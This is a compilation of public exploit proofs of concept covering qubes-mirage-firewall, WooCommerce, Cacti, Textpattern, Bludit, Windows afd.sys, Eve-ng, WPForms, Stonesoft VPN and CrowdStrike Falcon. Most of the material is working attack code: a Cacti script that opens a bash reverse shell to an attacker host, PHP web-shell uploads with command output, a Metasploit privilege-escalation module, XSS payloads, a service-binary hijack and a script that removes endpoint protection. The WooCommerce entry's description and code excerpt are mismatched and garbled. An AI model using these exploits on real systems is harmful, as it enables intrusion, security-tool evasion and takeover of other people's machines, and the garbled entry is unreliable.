<pre><code># Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)<br /># Date: 2022-12-04<br /># Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl><br /># Vendor Homepage: https://mirage.io/blog/MSA03<br /># Software Link: https://github.com/mirage/qubes-mirage-firewall/releases<br /># Version: >= 0.8.0 & < 0.8.4<br /># Tested on: Qubes OS<br /># CVE: CVE-2022-46770<br /><br />#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166<br /><br />#!/usr/bin/env python3<br /><br />from socket import socket, AF_INET, SOCK_DGRAM<br /><br />TARGET = "239.255.255.250"<br /><br />PORT = 5353<br /><br />PAYLOAD = b'a' * 607<br /><br />s = socket(AF_INET, SOCK_DGRAM)<br /><br />s.sendto(PAYLOAD, (TARGET, PORT))<br /> <br /><br /></code></pre>
<pre><code># Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)<br /># Date: 2022-12-07<br /># Author: Milad Karimi<br /># Vendor Homepage: https://wordpress.org/plugins/woocommerce<br /># Software Link: https://wordpress.org/plugins/woocommerce<br /># Tested on: windows 10 , firefox<br /># Version: 7.1.0<br /># CVE : N/A<br /><br /># Description:<br />simple, easy to use jQuery frontend to php backend that pings various<br />devices and changes colors from green to red depending on if device is<br />up or down.<br /><br /># PoC :<br /><br />http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php<br />http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php<br /><br /><br /># Vulnerabile code:<br /><br /> 95: $classname $classname($post_id); <br /> 94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); <br /> 92: ⇓ function save($post_id, $post)<br /> 93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); <br /> 92: ⇓ function save($post_id, $post)<br /><br /></code></pre>
<pre><code># Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)<br /># Exploit Author: Riadh BOUCHAHOUA<br /># Discovery Date: 2022-12-08 <br /># Vendor Homepage: https://www.cacti.net/<br /># Software Links : https://github.com/Cacti/cacti<br /># Tested Version: 1.2.2x <= 1.2.22<br /># CVE: CVE-2022-46169<br /># Tested on OS: Debian 10/11<br /><br />#!/usr/bin/env python3<br />import random<br />import httpx, urllib<br /><br />class Exploit:<br /> def __init__(self, url, proxy=None, rs_host="",rs_port=""):<br /> self.url = url <br /> self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)<br /> self.rs_host = rs_host<br /> self.rs_port = rs_port<br /><br /> def exploit(self):<br /> # cacti local ip from the url for the X-Forwarded-For header<br /> local_cacti_ip = self.url.split("//")[1].split("/")[0]<br /> <br /> headers = {<br /> 'X-Forwarded-For': f'{local_cacti_ip}'<br /> }<br /> <br /> revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"<br /> import base64<br /> b64_revshell = base64.b64encode(revshell.encode()).decode()<br /> payload = f";echo {b64_revshell} | base64 -d | bash -"<br /> payload = urllib.parse.quote(payload)<br /> urls = []<br /> <br /> # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)<br /> for host_id in range(1,100):<br /> for local_data_ids in range(1,100):<br /> urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")<br /> <br /> for url in urls:<br /> r = self.session.get(url,headers=headers)<br /> print(f"{r.status_code} - {r.text}" )<br /> pass<br /><br /> def random_user_agent(self):<br /> ua_list = [<br /> "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",<br /> "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",<br /> ]<br /> return random.choice(ua_list)<br /><br />def parse_args():<br /> import argparse<br /> <br /> argparser = argparse.ArgumentParser()<br /> argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")<br /> argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)<br /> argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)<br /> return argparser.parse_args()<br /><br />def main() -> None:<br /> # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL <br /> args = parse_args()<br /> e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)<br /> e.exploit()<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://textpattern.com/<br /># Version : 4.8.8<br /># Tested on: windows 11 xammp | Kali linux<br /># Category: WebApp<br /># Google Dork: intext:"Published with Textpattern CMS"<br /># Date: 10/09/2022<br />#<br />######## Description ########<br />#<br /># Step 1: Login admin account and go settings of site<br /># Step 2: Upload a file to web site and selecet the rce.php<br /># Step3 : Upload your webshell that's it...<br />#<br />######## Proof of Concept ########<br /><br /><br />========>>> START REQUEST <<<=========<br /><br /><br /><br /><br />############# POST REQUEST (FILE UPLOAD) ############################## (1)<br /><br />POST /textpattern/index.php?event=file HTTP/1.1<br />Host: localhost<br />Content-Length: 1038<br />sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"<br />Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/textpattern/index.php?event=file<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin<br />Connection: close<br /><br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="fileInputOrder"<br /><br />1/1<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="app_mode"<br /><br />async<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="MAX_FILE_SIZE"<br /><br />2000000<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="event"<br /><br />file<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="step"<br /><br />file_insert<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="id"<br /><br /><br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="_txp_token"<br /><br />16ea3b64ca6379aee9599586dae73a5d<br />------WebKitFormBoundaryMgUEFltFdqBVvdJu<br />Content-Disposition: form-data; name="thefile[]"; filename="rce.php"<br />Content-Type: application/octet-stream<br /><br /><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br />------WebKitFormBoundaryMgUEFltFdqBVvdJu--<br /><br /><br />############ POST RESPONSE (FILE UPLOAD) ######### (1)<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 10 Sep 2022 15:28:57 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6<br />X-Powered-By: PHP/8.1.6<br />X-Textpattern-Runtime: 35.38 ms<br />X-Textpattern-Querytime: 9.55 ms<br />X-Textpattern-Queries: 16<br />X-Textpattern-Memory: 2893 kB<br />Content-Length: 270<br />Connection: close<br />Content-Type: text/javascript; charset=utf-8<br /><br />___________________________________________________________________________________________________________________________________________________<br /><br />############ REQUEST TO THE PAYLOAD ############################### (2)<br /><br />GET /files/c.php?cmd=whoami HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: txp_login_public=4353608be0admin<br />Connection: close<br /><br /><br />############ RESPONSE THE PAYLOAD ############################### (2)<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 10 Sep 2022 15:33:06 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6<br />X-Powered-By: PHP/8.1.6<br />Content-Length: 29<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><pre>alpernae\alperen<br /></pre><br /><br />========>>> END REQUEST <<<=========<br /><br /></code></pre>
<pre><code># Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.bludit.com/<br /># Version : 3-14-1<br /># Tested on: windows 11 wampserver | Kali linux<br /># Category: WebApp<br /># Google Dork: intext:'2022 Powered by Bludit'<br /># Date: 8.12.2022<br />######## Description ########<br />#<br /># Step 1 : Archive as a zip your webshell (example: payload.zip)<br /># Step 2 : Login admin account and download 'UploadPlugin'<br /># Step 3 : Go to UploadPlugin section<br /># Step 4 : Upload your zip<br /># Step 5 : target/bl-plugins/[your_payload]<br />#<br />######## Proof of Concept ########<br /><br /><br />==============> START REQUEST <========================================<br /><br />POST /admin/plugin/uploadplugin HTTP/2<br />Host: localhost<br />Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264<br />Content-Length: 1820<br />Origin: https://036e-88-235-222-210.eu.ngrok.io<br />Dnt: 1<br />Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="tokenCSRF"<br /><br />b6487f985b68f2ac2c2d79b4428dda44696d6231<br />-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="pluginorthemes"<br /><br />plugins<br />-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="zip_file"; filename="a.zip"<br />Content-Type: application/zip<br /><br />PK †eˆU  a/PK  ”fˆUÆ ª)¢ Ä<br /> a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @V꺭!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtO̤Ҝ.<br />×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ „Œ&Âd<ó`÷+œN—’y¼Á<br />RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“<br />j±u<br />\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%<br />µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.<br />îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï<br />e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷<br />kC57j©'Î"m<br /> ã®ho¹ xŸô Û;’œcçzÙQ<br />Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~t6á¾,…ÅèçO´ÇÆ×Σv²±ãÿbÑڒ‘Ug[;pq›eÓÜÅØÿéJ<br />Ë}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK? †eˆU  $ €íA a/<br />   þš®,<br />Ù þš®,<br />Ù€ø¨j.<br />ÙPK?  ”fˆUÆ ª)¢ Ä<br /> $ €¤ a/a.php<br />   ¤eÝ-<br />Ù ÷C-<br />Ù bj.<br />ÙPK   ­ ç <br />-----------------------------308003478615795926433430552264<br />Content-Disposition: form-data; name="submit"<br /><br />Upload<br />-----------------------------308003478615795926433430552264--<br /><br /><br />==============> END REQUEST <========================================<br /><br />## WEB SHELL UPLOADED!<br /><br />==============> START RESPONSE <========================================<br /><br />HTTP/2 200 OK<br />Cache-Control: no-store, no-cache, must-revalidate<br />Content-Type: text/html; charset=UTF-8<br />Date: Thu, 08 Dec 2022 18:01:43 GMT<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4<br />Pragma: no-cache<br />Server: Apache/2.4.51 (Win64) PHP/7.4.26<br />X-Powered-By: Bludit<br />.<br />.<br />.<br />.<br /><br />==============> END RESPONSE <========================================<br /><br /># REQUEST THE WEB SHELL<br /><br />==============> START REQUEST <========================================<br /><br />GET /bl-plugins/a/a.php?cmd=whoami HTTP/2<br />Host: localhost<br />Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Dnt: 1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />==============> END REQUEST <========================================<br /><br />==============> START RESPONSE <========================================<br /><br />HTTP/2 200 OK<br />Content-Type: text/html; charset=UTF-8<br />Date: Thu, 08 Dec 2022 18:13:14 GMT<br />Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919<br />Server: Apache/2.4.51 (Win64) PHP/7.4.26<br />X-Powered-By: PHP/7.4.26<br />Content-Length: 32<br /><br /><pre>nt authority\system<br /></pre><br /><br />==============> END RESPONSE <========================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::Windows::Priv<br /> include Msf::Post::Windows::Process<br /> include Msf::Post::Windows::ReflectiveDLLInjection<br /> include Msf::Post::Windows::FileInfo<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> {<br /> 'Name' => 'Ancillary Function Driver (AFD) for WinSock Elevation of Privilege',<br /> 'Description' => %q{<br /> A vulnerability exists in the Windows Ancillary Function Driver for Winsock<br /> (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of<br /> NT AUTHORITY\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is<br /> possible to create an arbitrary kernel Write-Where primitive, which can be used<br /> to manipulate internal I/O ring structures and achieve local privilege<br /> escalation.<br /><br /> This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in<br /> January 2023 updates).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'chompie', # Github PoC<br /> 'b33f', # Github PoC<br /> 'Yarden Shafir', # I/O Ring R/W primitive PoC<br /> 'Christophe De La Fuente' # Metasploit module<br /> ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'Platform' => 'win',<br /> 'SessionTypes' => [ 'meterpreter' ],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [ 'Windows 11 22H2 x64', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'References' => [<br /> [ 'CVE', '2023-21768' ],<br /> [ 'URL', 'https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768' ],<br /> [ 'URL', 'https://github.com/yardenshafir/IoRingReadWritePrimitive' ]<br /> ],<br /> 'DisclosureDate' => '2023-01-10',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => []<br /> }<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> unless session.platform == 'windows'<br /> return Exploit::CheckCode::Safe('Only Windows systems are affected')<br /> end<br /><br /> major, minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntoskrnl.exe')<br /> vprint_status("Windows Build Number = #{build}.#{revision}")<br /><br /> unless major == 6 && minor == 2 && build == 22621<br /> return CheckCode::Safe('The exploit only supports Windows 11 22H2')<br /> end<br /><br /> if revision > 963<br /> return CheckCode::Safe("This Windows host seems to be patched (build 22621.#{revision})")<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> if is_system?<br /> fail_with(Failure::None, 'Session is already elevated')<br /> end<br /><br /> if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86<br /> fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')<br /> end<br /><br /> encoded_payload = payload.encoded<br /> execute_dll(<br /> ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21768', 'CVE-2023-21768.x64.dll'),<br /> [encoded_payload.length].pack('I<') + encoded_payload<br /> )<br /><br /> print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) <br /># Google Dork: N/A<br /># Date: 12/6/2022<br /># Exploit Author: @casp3r0x0 hassan ali al-khafaji<br /># Vendor Homepage: https://www.eve-ng.net/<br /># Software Link: https://www.eve-ng.net/index.php/download/<br /># Version: Free EVE Community Edition Version 5.0.1-13<br /># Tested on: Free EVE Community Edition Version 5.0.1-13<br /># CVE : N/A<br /><br /><br /><br />#we could achieve stored XSS on eve-ng free I don't know If this<br />effect pro version also<br />#first create a new lab<br />#second create a Text label<br />#insert the xss payload and click save "><script>alert(1)</script><br />#the application is multi user if any user open the lab the xss will be triggered.<br /><br /></code></pre>
<pre><code># Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)<br /># Date: 2022-12-05<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/wpforms-lite<br /># Version: 1.7.8<br /># Tested on: Windows 10<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script><br /><br /></code></pre>
<pre><code># Exploit Author : TOUHAMI KASBAOUI<br /># Vendor Homepage : https://www.forcepoint.com/ <br /># Software: Stonesoft VPN Windows<br /># Version : 6.2.0 / 6.8.0<br /># Tested on : Windows 10<br /># CVE : N/A<br />#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM<br /><br />#define UNICODE<br />#define _UNICODE<br />#include <Windows.h><br />#include <iostream><br /><br />using namespace std;<br />enum Result<br />{<br /> unknown,<br /> serviceManager_AccessDenied,<br /> serviceManager_DatabaseDoesNotExist,<br /> service_AccessDenied,<br /> service_InvalidServiceManagerHandle,<br /> service_InvalidServiceName,<br /> service_DoesNotExist,<br /> service_Exist<br />};<br /><br />Result ServiceExists(const std::wstring& serviceName)<br />{<br /> Result r = unknown;<br /><br /> SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);<br /><br /> if (manager == NULL)<br /> {<br /> DWORD lastError = GetLastError();<br /><br /> if (lastError == ERROR_ACCESS_DENIED)<br /> return serviceManager_AccessDenied;<br /> else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)<br /> return serviceManager_DatabaseDoesNotExist;<br /> else<br /> return unknown;<br /> }<br /><br /> SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);<br /><br /> if (service == NULL)<br /> {<br /> DWORD error = GetLastError();<br /><br /> if (error == ERROR_ACCESS_DENIED)<br /> r = service_AccessDenied;<br /> else if (error == ERROR_INVALID_HANDLE)<br /> r = service_InvalidServiceManagerHandle;<br /> else if (error == ERROR_INVALID_NAME)<br /> r = service_InvalidServiceName;<br /> else if (error == ERROR_SERVICE_DOES_NOT_EXIST)<br /> r = service_DoesNotExist;<br /> else<br /> r = unknown;<br /> }<br /> else<br /> r = service_Exist;<br /><br /> if (service != NULL)<br /> CloseServiceHandle(service);<br /><br /> if (manager != NULL)<br /> CloseServiceHandle(manager);<br /><br /> return r;<br />}<br /><br />bool ChangeName() {<br /> LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";<br /> LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";<br /> bool success = MoveFile(parrentvpnfilename, newName);<br /> if (success) {<br /> cerr << "[+] SVGVPN filename changed.\n";<br /> }<br /> else {<br /> cerr << "Failed to rename file \n";<br /> }<br /> return 0;<br />}<br /><br />int main() {<br /><br /> const uint8_t shellcode[7168] = {<br /> 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,<br /> 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br /> }; //You can set array bin of your reverse shell PE file here<br /><br /> std::wstring serviceName = L"sgipsecvpn";<br /> Result result = ServiceExists(serviceName);<br /> if (result == service_Exist)<br /> std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;<br /> else if (result == service_DoesNotExist)<br /> std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;<br /> else<br /> std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;<br /> ChangeName();<br /> HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);<br /> cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";<br /> if (fileHandle == INVALID_HANDLE_VALUE) {<br /> cerr << "Failed to create shellcode\n";<br /> return 1;<br /> }<br /><br /> DWORD bytesWritten;<br /> if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {<br /> cerr << "Failed to write to file\n";<br /> CloseHandle(fileHandle);<br /> return 1;<br /> }<br /> CloseHandle(fileHandle);<br /><br /> cout << "[+] Payload exported to ForcePointVPN \n";<br /> Sleep(30);<br /> cout << "[+] Restart ForcePointVPN Service \n";<br /> SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);<br /> SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);<br /><br /> SERVICE_STATUS serviceStatus;<br /> QueryServiceStatus(serviceHandle, &serviceStatus);<br /> if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {<br /> ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);<br /> while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {<br /> QueryServiceStatus(serviceHandle, &serviceStatus);<br /> Sleep(1000);<br /> }<br /> }<br /> StartService(serviceHandle, NULL, NULL);<br /><br /> CloseServiceHandle(serviceHandle);<br /> CloseServiceHandle(scmHandle);<br /><br /> return 0;<br />}<br /></code></pre>
<pre><code># Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token <br /># Date: 30/11/2022 <br /># Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team) <br /># Vendor Homepage: https://www.crowdstrike.com/ <br /># Author Homepage: https://www.deda.cloud/ <br /># Tested On: All Windows versions <br /># Version: 6.44.15806 <br /># CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress. <br /><br /><br />$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"<br /><br />foreach($obj in $InstalledSoftware){<br /> if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))<br /> {<br /> $uninstall_uuid = $obj.Name.Split("\")[6]<br /> }<br />}<br /><br />$g_msiexec_instances = New-Object System.Collections.ArrayList<br /><br />Write-Host "[+] Identified installed Falcon: $uninstall_uuid"<br />Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."<br />Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"<br /><br />while($true)<br />{<br /> if (get-process -Name "CSFalconService") {<br /> Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {<br /> <br /> if (-Not $g_msiexec_instances.contains($_.id)){<br /> $g_msiexec_instances.Add($_.id)<br /> if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){<br /> Start-Sleep -Milliseconds 100<br /> Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]<br /> stop-process -Force -Id $g_msiexec_instances[-1] <br /> }<br /><br /> }<br /> <br /> }<br /> } else { <br /> Write-Host "[+] CSFalconService process vanished...reboot and have fun!"<br /> break<br /> }<br />}<br /><br /></code></pre>